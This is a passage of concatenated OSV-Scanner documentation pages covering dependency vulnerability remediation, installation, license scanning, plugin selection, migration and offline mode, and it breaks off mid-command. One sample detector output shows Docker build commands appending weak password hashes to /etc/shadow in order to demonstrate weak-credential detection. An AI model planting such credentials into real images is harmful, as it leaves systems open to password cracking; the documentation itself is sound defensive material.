Sample override JSON output ```json { "path": "path/to/pom.xml", "ecosystem": "Maven", "strategy": "override", "vulnerabilities": [ { "id": "GHSA-3832-9276-x7gf", "packages": [ { "name": "commons-httpclient:commons-httpclient", "version": "3.0.1" } ], "unactionable": true }, { "id": "GHSA-56h3-78gp-v83r", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-6hgm-866r-3cjv", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] }, { "id": "GHSA-6phf-73q6-gh87", "packages": [ { "name": "commons-beanutils:commons-beanutils", "version": "1.7.0" } ] }, { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] }, { "id": "GHSA-7rf3-mqpx-h7xg", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-c27h-mcmw-48hv", "packages": [ { "name": "org.codehaus.jackson:jackson-mapper-asl", "version": "1.8.8" } ], "unactionable": true }, { "id": "GHSA-cgp8-4m63-fhh5", "packages": [ { "name": "commons-net:commons-net", "version": "1.4.1" } ] }, { "id": "GHSA-fjq5-5j5f-mvxh", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] }, { "id": "GHSA-grr4-wv38-f68w", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] }, { "id": "GHSA-q6g2-g7f3-rr83", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-r6j9-8759-g62w", "packages": [ { "name": "org.codehaus.jackson:jackson-mapper-asl", "version": "1.8.8" } ], "unactionable": true }, { "id": "GHSA-x27m-9w8j-5vcw", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] } ], "patches": [ { "packageUpdates": [ { "name": "org.codehaus.jettison:jettison", "versionFrom": "1.1", "versionTo": "1.5.4", "transitive": true } ], "fixed": [ { "id": "GHSA-56h3-78gp-v83r", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-7rf3-mqpx-h7xg", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-grr4-wv38-f68w", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-q6g2-g7f3-rr83", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] }, { "id": "GHSA-x27m-9w8j-5vcw", "packages": [ { "name": "org.codehaus.jettison:jettison", "version": "1.1" } ] } ] }, { "packageUpdates": [ { "name": "commons-collections:commons-collections", "versionFrom": "3.2.1", "versionTo": "3.2.2", "transitive": true } ], "fixed": [ { "id": "GHSA-6hgm-866r-3cjv", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] }, { "id": "GHSA-fjq5-5j5f-mvxh", "packages": [ { "name": "commons-collections:commons-collections", "version": "3.2.1" } ] } ] }, { "packageUpdates": [ { "name": "commons-io:commons-io", "versionFrom": "2.1", "versionTo": "2.14.0", "transitive": false } ], "fixed": [ { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.1" } ] } ] }, { "packageUpdates": [ { "name": "commons-beanutils:commons-beanutils", "versionFrom": "1.7.0", "versionTo": "1.9.4", "transitive": true } ], "fixed": [ { "id": "GHSA-6phf-73q6-gh87", "packages": [ { "name": "commons-beanutils:commons-beanutils", "version": "1.7.0" } ] } ] }, { "packageUpdates": [ { "name": "commons-net:commons-net", "versionFrom": "1.4.1", "versionTo": "3.9.0", "transitive": false } ], "fixed": [ { "id": "GHSA-cgp8-4m63-fhh5", "packages": [ { "name": "commons-net:commons-net", "version": "1.4.1" } ] } ] } ] } ```
## Scripted usage The non-interactive mode, in combination with [other flags](#remediation-flags), can be used in scripts to automatically apply and test remediation patches. Check out our [sample Python script](https://github.com/google/osv-scanner/blob/main/scripts/examples/auto_guided_remediation.py) that uses `osv-scanner fix` to remediate as many vulnerabilities as possible in an npm project without failing your project's `npm run test`. ## Interactive mode Interactive mode provides a step-by-step process to understand and fix vulnerabilities in your project. {: .note } Interactive mode currently only supports npm manifest and lockfiles. To run it, you can use the following command: ```bash osv-scanner fix --interactive -M path/to/package.json -L path/to/package-lock.json ``` {: .warning } The subcommand will modify your manifest and lockfile. Make sure you commit or backup your files before running. The command will launch the Guided Remediation TUI and begin scanning your manifest and lockfile for vulnerabilities. Use the arrow keys to navigate menu items and the `ENTER` key to select. `TAB` can be used to switch to and from the information panel of each option. ![Screenshot of the initial interactive results screen, showing found vulnerabilities and the potential remediation approaches](images/guided-remediation-result.png) {: .highlight } > The initial screen allows you to change the vulnerability selection criteria. Each correspond to a [vulnerability selection flag](#vulnerability-selection): > > - Max dependency depth: `--max-depth` > - Min CVSS score: `--min-severity` > - Exclude dev only: `--ignore-dev` From the first results screen, you can select which of the two remediation strategies to attempt. ## Remediation strategies There are currently three remediation strategies: ### In-place lockfile changes 'In-place' remediation involves replacing vulnerable versions of packages in your lockfile with non-vulnerable versions, while still respecting the existing constraints for that dependency. This approach is usually less risky, but will often fix less vulnerabilities than the [relax strategy](#relock-and-relax-direct-dependencies). Selecting the "Modify lockfile in place" option will bring you to the in-place information page. From here, you can see which vulnerabilities can and cannot be resolved by this strategy. By default, every possible in-place patch will be chosen to be applied. You may instead choose which subset of patches you wish to apply. ![Screenshot of the interactive in-place results screen](images/guided-remediation-in-place-results.png) ![Screenshot of the interactive in-place patch selection screen](images/guided-remediation-in-place-choose.png) If you wish to apply the proposed in-place patches, select the "Write" option to update your lockfile with the new dependency versions. {: .note } Writing these changes will not reinstall your dependencies. You'll need to run `npm ci` (or equivalent) separately. ### Relock and relax direct dependencies Relocking recomputes your entire dependency graph based on your manifest file, taking the newest possible versions of all your required packages. Doing so will often allow for constraints on vulnerable packages to be unblocked and thus able to be remediated. However, relocking may cause a large number of changes to your dependency graph, which potentially carries a larger risk of breakages. Selecting the "Relock" option will bring you to the relock information page. Here, you can see which vulnerabilities are present after relocking. In addition to relocking, it may be possible to further remove vulnerabilities by bumping the required version constraints of your direct dependencies. You may choose to apply these patches by selecting them on the relock page then choosing the "Apply pending patches" option. The dependency graph will then be recomputed, and you may continue to select more options. ![Screenshot of the interactive relock results screen with some relaxation patches selected](images/guided-remediation-relock-patches.png) The relaxation patches are presented in order of effectiveness, with patches that resolve the most vulnerabilities with the least amount of dependency change shown first. If you wish to apply your current relock & relaxation changes, select the "Write" option to update your manifest file with the new requirements and regenerate your lockfile (if provided). {: .note } The `package-lock.json` file is regenerated by first deleting the existing `package-lock.json` and `node_modules/` directory, then running `npm install --package-lock-only`. This recreates the lockfile but does not install the `node_modules/` dependencies. Run `npm ci` separately to install the dependencies. ### Override dependency versions {: .note } The `override` strategy is currently only supported in non-interactive mode. Maven allows for the version specification of direct and indirect dependencies to be overwritten by a POM's ``. This mechanism can be used to force a vulnerable dependency to be updated to a newer, non-vulnerable version. Overriding dependency versions can enable otherwise inaccessible updates, but it also risks breaking the application if the new version is incompatible with other dependencies. If a direct dependency is vulnerable, the override strategy will update its version in the `` section (if possible). Relevant `` will be updated if used by an existing version specification. As with the other strategies, override patches are prioritized by vulnerabilities fixed per updated dependency. ## Remediation flags The `fix` subcommand has a number of flags to allow you to control which vulnerabilities and patches may be considered during remediation. Guided remediation can be run in the [interactive mode](#interactive-mode) with `--interactive` flag. ### Non-interactive flags The following flags may be used when running in non-interactive mode only: - `--strategy=` [`in-place`](#in-place-lockfile-changes) OR [`relax`](#relock-and-relax-direct-dependencies) OR [`override`](#override-dependency-versions): Which remediation strategy to use. - `--apply-top=`: Specifies the maximum number of patches to apply. Patches are chosen in the same order as they would appear in the interactive mode. For example, `--apply-top=1` will only apply one patch, and `--apply-top=2` would apply the two best compatible patches. This flag is particularly useful when scripting to test the outcome of specific patches. Setting `--apply-top=-1` will apply every possible patch (default behavior). - `--no-introduce`: Set to exclude patches that would introduce new vulnerabilities if applied. - `--format=` `text` OR `json`. The [output format](#output-formats) to use for results. ### Vulnerability selection The following flags may be used to filter which vulnerabilities will be selected for remediation: - `--max-depth=`: The maximum dependency depth to consider vulnerabilities from. For example, `--max-depth=1` will only consider vulnerabilities affecting direct dependencies, while `--max-depth=2` will consider up to the direct dependencies of your direct dependencies. Setting `--max-depth=-1` will consider all dependencies, regardless of depth. - `--min-severity=`: The minimum CVSS score of vulnerabilities to consider. For example, `--min-severity=7.5` will consider only vulnerabilities with CVSS a score of 7.5 and above. If the OSV record for the vulnerability does not have a CVSS score, it will **not** be excluded. - `--ignore-dev`: Whether to exclude vulnerabilities from dependencies that are only used in `devDependencies`. - `--ignore-vulns=`: A list of OSV IDs to exclude from consideration. - `--vulns=`: An explicit list of OSV IDs that should exclusively be considered, as long as the other criteria are satisfied. A vulnerability is only considered if it satisfies all the conditions set by these flags. ### Dependency upgrade options The following flag may be used to limit the patches allowed for your dependencies: - `--upgrade-config=<[package-name:]level>` Sets the maximum upgrade level allowed for a package. Can be repeated for multiple packages. `level` is the SemVer component to allow updates to, can be one of `major`, `minor`, `patch`, or `none`. e.g. If a package was at version `1.2.3` - `major` allows for updates to any version `>=1.2.3` - `minor` allows for updates `>=1.2.3, <2.0.0` - `patch` allows for updates `>=1.2.3, <1.3.0` - `none` disallows any updates If `package-name:` is omitted, `level` is applied to all packages. The specific `package-name:level` will take precedence over the general `level` (e.g. specifying both `minor` `pkg:none` will use `none` as the allowed level for `pkg`). Default behaviour is `--upgrade-config=major`. Example usage: - `--upgrade-config=minor` - disallow any patches that would bump a major version of any package. - `--upgrade-config=foo:minor` - disallow any patches that bumps package `foo` by a major version. Other packages may receive major version-updating patches. - `--upgrade-config=none --upgrade-config=foo:patch` - only allow patches to package `foo`, and only allow changes to `foo`'s SemVer patch level. ### Data source By default, we use the [deps.dev API](https://docs.deps.dev/api/) to find version and dependency information of packages during remediation. If instead you'd like to use your ecosystem's native registry API (e.g. `https://registry.npmjs.org`), you can use the `--data-source=native` flag. `osv-scanner fix` will attempt to use the authentication specified by the native tooling (e.g. `npm config` or Maven's `settings.xml`) {: .highlight } If your project uses mirrored or private registries, you will need to use `--data-source=native` {: .note } > The subcommand caches the requests it makes in `[FILE].resolve.deps` (deps.dev), `package.json.resolve.npm` (native npm), or `pom.xml.resolve.maven` (native Maven). > > The native caches will store the addresses of private registries used, though not any authentication information. ### Maven flags - `--maven-fix-management`: If set, patches for vulnerabilities in packages declared in `` will be made, even if those packages are not found in the resolved dependency tree (useful for patching parent POM files). - `--maven-registry=`: Override for the default registry used to fetch dependencies (typically the `central` repository at `https://repo.maven.apache.org/maven2`) ### Offline Vulnerability Database The `fix` subcommand supports the `--offline-vulnerabilities` and `--download-offline-databases` flags. For more information, see [Offline Mode](./offline-mode.md). ## Known issues - The subcommand does not use the `osv-scanner.toml` configuration. Use the `--ignore-vulns` flag instead. - The subcommand does not group aliases of the same vulnerabilities together. - Unique vulnerabilities are counted differently with `fix --strategy=relax` versus with `fix --strategy=in-place` and with `scan`. `scan` will count the same OSV ID affecting two different package versions separately, whereas `fix --strategy=relax` will count this as one vulnerability. e.g. if `OSV-123-456` affects both `foo@1.0.0` and `foo@2.0.0` in your project, `scan` and `fix --strategy=in-place` will treat this as two distinct vulnerabilities, while `fix --strategy=relax` will treat this as only one. ### npm - Non-registry dependencies (local paths, URLs, Git, etc.) are not evaluated. - [#1026](https://github.com/google/osv-scanner/issues/1026) `peerDependencies` are not properly considered during dependency resolution (treated as if using `--legacy-peer-deps`). - `overrides` are ignored during dependency resolution. #### Workspaces Remediation in npm `workspaces` is only partially supported: - In-place updates should function correctly on the workspace `package-lock.json`. - Dependency relaxation can change dependencies in the `package.json` file being scanned. This means only dependencies declared in the root package can be changed. - You can remediate the individual `package.json` files of each workspace, but this will be unaware of any packages or constraints caused by sibling workspaces. - The `node_modules/` in workspaces are not deleted when relocking, which may impact the resulting dependency graph when running `npm install`. - Each workspace package is considered dependency depth 1 from the root workspace. ### Maven - [#1238](https://github.com/google/osv-scanner/issues/1238) Dependencies that use properties in their `groupId`/`artifactId` may not be updated correctly. - [#1239](https://github.com/google/osv-scanner/issues/1239) Support for profiles is limited. - Encrypted values in `settings.xml` files are not supported. ================================================ FILE: docs/index.md ================================================ --- # Feel free to add content and custom Front Matter to this file. # To modify the layout, see https://jekyllrb.com/docs/themes/#overriding-theme-defaults layout: home nav_order: 1 --- # OSV-Scanner [![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/google/osv-scanner/badge)](https://api.securityscorecards.dev/projects/github.com/google/osv-scanner) [![Go Report Card](https://goreportcard.com/badge/github.com/google/osv-scanner)](https://goreportcard.com/report/github.com/google/osv-scanner) [![SLSA 3](https://slsa.dev/images/gh-badge-level3.svg)](https://slsa.dev) [![GitHub Release](https://img.shields.io/github/v/release/google/osv-scanner)](https://github.com/google/osv-scanner/releases) Use OSV-Scanner to find existing vulnerabilities affecting your project's dependencies. OSV-Scanner provides an officially supported frontend to the [OSV database](https://osv.dev/) that connects a project’s list of dependencies with the vulnerabilities that affect them. You can use OSV-scanner in two ways: 1. **As a CLI tool:** Run directly in a terminal or CI/CD pipeline to scan projects. See the [Installation Guide](./installation.md) to get started. 2. **As a Go library:** Import the [Go package](https://pkg.go.dev/github.com/google/osv-scanner/v2/pkg/osvscanner) to integrate vulnerability scanning logic into Go applications. Since the OSV.dev database is open source and distributed, it has several benefits in comparison with closed source advisory databases and scanners: - Each advisory comes from an open and authoritative source (e.g. the [RustSec Advisory Database](https://github.com/rustsec/advisory-db)) - Anyone can suggest improvements to advisories, resulting in a very high quality database - The OSV format unambiguously stores information about affected versions in a machine-readable format that precisely maps onto a developer’s list of packages The above all results in fewer, more actionable vulnerability notifications, which reduces the time needed to resolve them. Check out our [announcement blog post] for more details! [announcement blog post]: https://security.googleblog.com/2022/12/announcing-osv-scanner-vulnerability.html ================================================ FILE: docs/installation.md ================================================ --- layout: page permalink: /installation/ nav_order: 3 --- # Installation You may download the [SLSA3](https://slsa.dev) compliant binaries for Linux, macOS, and Windows from our [releases page](https://github.com/google/osv-scanner/releases). ## Package Managers [![Packaging status](https://repology.org/badge/vertical-allrepos/osv-scanner.svg)](https://repology.org/project/osv-scanner/versions) ### Windows Scoop [Windows Scoop](https://scoop.sh) users can install osv-scanner from the [official bucket](https://github.com/ScoopInstaller/Main/blob/master/bucket/osv-scanner.json): ```bash scoop install osv-scanner ``` ### Windows WinGet Windows users can also install osv-scanner from the official [WinGet repo](https://github.com/microsoft/winget-pkgs): ```bash winget install Google.OSVScanner ``` ### Homebrew [Homebrew](https://brew.sh/) users can install [osv-scanner](https://formulae.brew.sh/formula/osv-scanner) via: ```bash brew install osv-scanner ``` ### Arch Linux Arch Linux users can install osv-scanner from the official repo: ```bash pacman -S osv-scanner ``` ### Alpine Linux Alpine Linux users can install osv-scanner from the official repo: ```bash apk add osv-scanner ``` ### FreeBSD FreeBSD users can install osv-scanner from the official repo: ```bash pkg install osv-scanner ``` ### NetBSD NetBSD users can install osv-scanner from the official repo: ```bash pkg_add osv-scanner ``` ### OpenBSD OpenBSD users can install osv-scanner from the official repo: ```bash pkg_add osv-scanner ``` ## Install from source Alternatively, you can install this from source by running: ```bash go install github.com/google/osv-scanner/v2/cmd/osv-scanner@latest ``` This requires Go 1.25.7+ to be installed. ## Build from source See our [contribution guidelines](https://github.com/google/osv-scanner/blob/main/CONTRIBUTING.md) for instructions on how to build from source. ## Verifying Builds Each of our releases come with SLSA provenance data (`multiple.intoto.jsonl`), which can be used to verify the source and provenance of the binaries with the [`slsa-verifier`](https://github.com/slsa-framework/slsa-verifier) tool. E.g. ```bash slsa-verifier verify-artifact ./osv-scanner_1.2.0_linux_amd64 --provenance-path multiple.intoto2.jsonl --source-uri github.com/google/osv-scanner --source-tag v1.2.0 ``` ## SemVer Adherence All releases on the same Major version will be guaranteed to have backward compatible JSON output and CLI arguments. However, features prefixed with `experimental` (e.g. `--experimental-call-analysis`) might be changed or removed with only a Minor version change. ================================================ FILE: docs/license-scanning.md ================================================ --- layout: page permalink: /usage/license-scanning/ parent: Usage nav_order: 3 --- # License Scanning {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner supports license checking as an official feature. The data comes from the [deps.dev API](https://docs.deps.dev/api/). ## License Summary and Violations The `--licenses` flag provides a summary of the licenses used by your dependencies. To also display violations, you can provide an allowlist of permitted licenses as an argument: ```bash # Show license summary only osv-scanner --licenses path/to/repository # Show the license summary and violations against an allowlist (provide the list after the = sign): osv-scanner --licenses="comma-separated list of allowed licenses" path/to/directory ``` Include your allowed licenses as a comma-separated list. OSV-Scanner recognizes licenses in SPDX format. Please indicate your allowed licenses using [SPDX license](https://spdx.org/licenses/) identifiers. ### License violations example If you wanted to allow the following licenses: - [BSD 3-Clause "New" or "Revised" License](https://spdx.org/licenses/BSD-3-Clause.html) - [Apache License 2.0](https://spdx.org/licenses/Apache-2.0.html) - [MIT](https://spdx.org/licenses/MIT.html) Your command would be in this form: ```bash osv-scanner --licenses="BSD-3-Clause,Apache-2.0,MIT" path/to/directory ``` ## Override License Sometimes, the license either cannot be retrieved, or does not apply to your specific use. In those cases, you can override the license of a specific package by setting it in the config file. See the [configuration docs](./configuration.md) for how to do this. ================================================ FILE: docs/manual-plugin-selection.md ================================================ --- layout: page permalink: /experimental/manual-plugin-selection/ parent: Experimental Features nav_order: 5 --- # Manual OSV-Scalibr Plugin Selection Experimental {: .label } {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
By default, OSV-Scanner automatically enables the relevant plugins for each scanning situation (see [this page](./supported_languages_and_lockfiles.md) for more details). However, if the default selection is not suitable, or you require additional plugins from OSV-Scalibr (e.g., detectors), you can manually enable or disable them. ## Enabling and Disabling Plugins You can control which plugins to run using the following flags: - `--experimental-plugins`: Enables a comma-separated list of specific plugins that will be used along with the default plugins for the command being run - `--experimental-disable-plugins`: Disables a comma-separated list of specific plugins. - `--experimental-no-default-plugins`: Excludes the default plugins for the command being run from being automatically included For a full list of available plugin names, see OSV-Scalibr's documentation here: https://github.com/google/osv-scalibr/blob/main/docs/supported_inventory_types.md ### Presets You can also enable or disable various presets, which group multiple plugins together. **Example:** ```bash # This will enable all sbom plugins + cargolock extractor + requirements extractor osv-scanner scan source --experimental-plugins sbom,rust/cargolock,python/requirements # This will enable all lockfile plugins, except the cargolock and requirements extractors osv-scanner scan source --experimental-plugins lockfile --experimental-disable-plugins rust/cargolock,python/requirements ``` **Available Presets:** | Preset | Description | | :---------- | :------------------------------ | | `sbom` | Default for directory scanning. | | `lockfile` | Default for lockfile scanning. | | `directory` | Default for directory scanning. | | `artifact` | Default for image scanning. | ### Detectors OSV-Scalibr provides detectors that can identify potential security issues beyond known vulnerabilities. We experimentally support these detectors. Currently, detector findings are only available in the JSON output under `experimental_generic_findings`. **Available Detector Presets:** | Preset | Description | | :------------ | :----------------------------------------- | | `untested` | Finds dependencies that are not tested. | | `weakcreds` | Detects weak credentials. | | `govulncheck` | Checks for vulnerabilities in Go binaries. | | `cis` | Checks for compliance with CIS benchmarks. |
Example detector run ```bash osv-scanner scan image --experimental-plugins=os/apk,weakcredentials/etcshadow --format=json ``` ```json { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.10.6-r0", "ecosystem": "Alpine:v3.10", "commit": "ee458ccae264321745e9622c759baf110130eb2f", "image_origin_details": { "index": 0 } }, "vulnerabilities": ["CVE-2021-36159"], "groups": 1 } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "experimental_generic_findings": [ { "Adv": { "ID": { "Publisher": "SCALIBR", "Reference": "etc-shadow-weakcredentials" }, "Title": "Ensure all users have strong passwords configured", "Description": "The /etc/shadow file contains user account password hashes. These passwords must be strong and not easily guessable.", "Recommendation": "Run the following command to reset password for the reported users:/n# change password for USER: sudo passwd USER", "Sev": 5 }, "Target": { "Extra": "/etc/shadow: The following users have weak passwords:/nuser-bcrypt/n" }, "Plugins": ["weakcredentials/etcshadow"], "ExploitabilitySignals": null } ], "image_metadata": { "os": "Alpine Linux v3.10", "layer_metadata": [ { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:c5377eaa926bf412dd8d4a08b0a1f2399cfd708743533b0aa03b53d14cb4bb4e in / ", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [\"/bin/sh\"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-descrypt:chERDiI95PGCQ' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null } ] } } ```
================================================ FILE: docs/migrating-from-scalibr.md ================================================ --- layout: default title: Migrating from osv-scalibr nav_order: 18 --- # Migrating from osv-scalibr to osv-scanner This guide is for users who are familiar with `osv-scalibr` and want to migrate to `osv-scanner`. It explains how to achieve similar results with `osv-scanner`. `osv-scanner` has integrated `osv-scalibr`'s inventory collection and vulnerability scanning capabilities. While most of `osv-scalibr`'s functionalities are available in `osv-scanner`, the command-line flags and output formats are different. ## Command-line Equivalence The `osv-scanner` CLI is designed to be more intuitive and user-friendly. Here's a mapping of common `osv-scalibr` commands to their `osv-scanner` equivalents. ### Scanning a directory **osv-scalibr:** ```sh scalibr --root /path/to/your/project --result result.json ``` **osv-scanner:** ```sh osv-scanner /path/to/your/project ``` ### Selecting plugins OSV-Scanner has access to the full list of OSV-Scalibr plugins, though only a well tested subset of them are enabled by default in OSV-Scanner. In `osv-scalibr`, you can select which plugins to run using the `--extractors`, `--detectors` flags, or alternatively using the `--plugins` flag. For a full list of available plugin names, see OSV-Scalibr's documentation here: https://github.com/google/osv-scalibr/blob/main/docs/supported_inventory_types.md **osv-scalibr:** ```sh scalibr --plugins python/pip,go/gomod --detectors go/govulncheck /path/to/your/project ``` In `osv-scanner`, you can achieve the same by using the `--experimental-plugins` flag. This is an experimental feature. **osv-scanner:** ```sh osv-scanner --experimental-plugins python/pip,go/gomod,go/govulncheck /path/to/your/project ``` `osv-scanner` lets you exclude its default plugins with `--experimental-no-default-plugins`, for when you want to only run specific plugins. `osv-scanner` also allows you to disable specific plugins with `--experimental-disable-plugins`. For more details on manual plugin selection in `osv-scanner`, see the [manual plugin selection documentation](manual-plugin-selection.md). ### Generating SPDX output `osv-scalibr` uses the `-o` flag to specify the output format and file. For example, to generate an SPDX JSON report: **osv-scalibr:** ```sh scalibr -o spdx23-json=result.spdx.json /path/to/your/project ``` `osv-scanner` uses the `--format` flag to specify the output format and the output is written to standard output, and a separate `--output-file` flag if you wish to save the output into a file. **osv-scanner:** ```sh osv-scanner --format spdx-2.3-json /path/to/your/project > result.spdx.json ``` For more details on `osv-scanner` output formats, see the [output documentation](output.md). ## Flag Translation Table | `osv-scalibr` Flag | `osv-scanner` Flag | Notes | | --------------------------------- | ------------------------- | ---------------------------------------------------------------------------------------------------------- | | `--version` | `--version` | `osv-scanner version` | | `--root` | `[directory]` (argument) | `osv-scanner scan source [directory]` | | `--result` | `--output` | `osv-scanner --output ` | | `-o` | `--format` and `--output` | e.g. `osv-scalibr -o spdx23-json=r.json` becomes `osv-scanner --format spdx-2.3-json --output-file r.json` | | `--plugins` | `--experimental-plugins` | | | `--extractors` | `--experimental-plugins` | | | `--detectors` | `--experimental-plugins` | | | `--annotators` | `--experimental-plugins` | | | `--ignore-sub-dirs` | (no direct equivalent) | `osv-scanner` is not recursive by default. Use `--recursive` to enable. | | `--skip-dirs` | Not yet available | | | `--skip-dir-regex` | Not yet available | | | `--skip-dir-glob` | Not yet available | | | `--max-file-size` | Not yet available | | | `--use-gitignore` | (default behavior) | Use `--no-ignore` to disable. | | `--remote-image` | `[image]` (argument) | `osv-scanner scan image [image]` | | `--image-tarball` | `--archive` | `osv-scanner scan image --archive [tarball]` | | `--image-local-docker` | `[image]` (argument) | `osv-scanner scan image [image]` (it will look for local images first) | | `--image-platform` | Not yet available | | | `--gobinary-version-from-content` | Not yet available | | | `--govulncheck-db` | Not yet available | | | `--spdx-document-name` | Not yet available | | | `--spdx-document-namespace` | Not yet available | | | `--spdx-creators` | Not yet available | | | `--cdx-component-name` | Not yet available | | | `--cdx-component-type` | Not yet available | | | `--cdx-component-version` | Not yet available | | | `--cdx-authors` | Not yet available | | | `--verbose` | `--verbosity` | `osv-scanner --verbosity `, e.g. `debug`. | | `--explicit-extractors` | (default behavior) | | | `--filter-by-capabilities` | (default behavior) | `osv-scanner` automatically filters plugins. | | `--windows-all-drives` | Not yet available | | | `--offline` | `--offline` | | | `--local-registry` | `--maven-registry` | Only for Maven. | ================================================ FILE: docs/migration-guide.md ================================================ # Migration Guide ## `v1` to `v2` migration guide ### CLI changes: Most experimental commands have now been stablized, all experimental versions of these flags have been removed: - `--experimental-call-analysis` => `--call-analysis` - `--experimental-no-call-analysis` => `--no-call-analysis` - `--experimental-all-packages` => `--all-packages` - `--experimental-licenses` & `--experimental-license-summary` => `--licenses` - Instead of two separate flags, by having no values after `--licenses`, it behaves the same way as just `--experimental-license-summary` - You can still specify the license allow list after `--licenses` flag like so: `--licenses="MIT,Apache 2.0,..."` - `--experimental-offline` => `--offline` - `--experimental-offline-vulnerabilities` => `--offline-vulnerabilities` - `--experimental-download-offline-databases` => `--download-offline-databases` - `--experimental-no-resolve` => `--no-resolve` --- Container scanning and the `--docker/-D` flag has been migrated to its own command. ```bash osv-scanner scan image ``` --- [Guided remeidation](https://google.github.io/osv-scanner/experimental/guided-remediation/) now defaults to the non-interactive mode. To run in the interactive mode, use the `--interactive` flag. --- `--verbosity=verbose` verbosity level removed. Now there are only `info`, `warn`, `error` verbosity levels. --- `osv-scanner ` is now a shortcut for `osv-scanner scan source `. --- SBOM scanning (`osv-scanner --sbom`) now relies on the filename of the sbom file to follow the relevant SBOM specs. E.g. `*.spdx.json`. --- The `.git` root hash directory is not automatically scanned now, therefore: `--skip-git` flag removed, replaced with `--include-git-root`. --- The following deprecated flags have been removed: - `scan --json` removed, please use `--format=json` - `fix --disallow-major-upgrades` removed - `fix --disallow-package-upgrades` ### JSON output changes: License summary is now in JSON output when `--license-summary` is used, rather than showing every package. ================================================ FILE: docs/offline-mode.md ================================================ --- layout: page permalink: /usage/offline-mode/ parent: Usage nav_order: 4 --- # Offline Mode {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner now supports offline scanning as an official feature. Offline scanning checks your project against a local database instead of calling the OSV.dev API. ## Specify database location Our offline features require the use of a local database, the location of which is determined through the use of the `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` environment variable. The local database file structure is in this form: ``` {local_db_dir}/ osv-scanner/ npm/all.zip PyPI/all.zip … {ecosystem}/all.zip ``` Where `{local_db_dir}` can be set by the `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` environment variable. If the `OSV_SCANNER_LOCAL_DB_CACHE_DIRECTORY` environment variable is _not_ set, OSV-Scanner will attempt to look for the database in the following locations, in this order: 1. The location returned by [`os.UserCacheDir`](https://pkg.go.dev/os#UserCacheDir) 2. The location returned by [`os.TempDir`](https://pkg.go.dev/os#TempDir) The database can be [downloaded manually](#manual-database-download) or by using the [`--download-offline-databases` flag](#download-offline-databases-option). ## Offline option The offline database flag `--offline` causes OSV-Scanner to scan your project against a previously downloaded local database. OSV-Scanner will not download or update the local database, nor will it send any project or dependency information anywhere. When a local database is not present, you will get an error message. No network connection is required when using this flag. ```bash osv-scanner --offline ./path/to/your/dir ``` To use offline mode for just the vulnerability database, but allow other features to possibly make network requests (e.g. [transitive dependency scanning](./supported_languages_and_lockfiles.md#transitive-dependency-scanning)), you can use the `--offline-vulnerabilities` flag instead. ## Download offline databases option The download offline databases flag `--download-offline-databases` allows OSV-Scanner to download or update your local database when running in offline mode, to make it easier to get started. This option only works when you also set the offline flag. ```bash osv-scanner --offline-vulnerabilities --download-offline-databases ./path/to/your/dir ``` ## Manual database download Instead of using the `--download-offline-databases` flag to download the database, it is possible to manually download the database. A downloadable copy of the OSV database is stored in a GCS bucket maintained by OSV: [`gs://osv-vulnerabilities`](https://osv-vulnerabilities.storage.googleapis.com) This bucket contains zip files containing all vulnerabilities for each ecosystem at: `gs://osv-vulnerabilities//all.zip`. E.g. for PyPI vulnerabilities: ```bash gcloud storage cp gs://osv-vulnerabilities/PyPI/all.zip . ``` You can also download over HTTP via `https://osv-vulnerabilities.storage.googleapis.com//all.zip`. A list of all current ecosystems is available at [`gs://osv-vulnerabilities/ecosystems.txt`](https://osv-vulnerabilities.storage.googleapis.com/ecosystems.txt). Set the location of your manually downloaded database by following the instructions [here](#specify-database-location). ## Limitations 1. Commit level scanning is not supported. ================================================ FILE: docs/osv-reporter.md ================================================ --- layout: page permalink: /experimental/osv-reporter/ parent: Experimental Features nav_order: 4 --- # OSV-Reporter Experimental {: .label } OSV-Reporter can be used to perform some experimental operations on the OSV-Scanner output JSON. ## Features - Create a diff between two osv-scanner.json outputs, so you can see only new vulnerabilities. ```bash $ osv-reporter --old previous-osv-scanner.json --new current-osv-scanner.json ``` - Output multiple different formats from a single set of scan results. ```bash $ 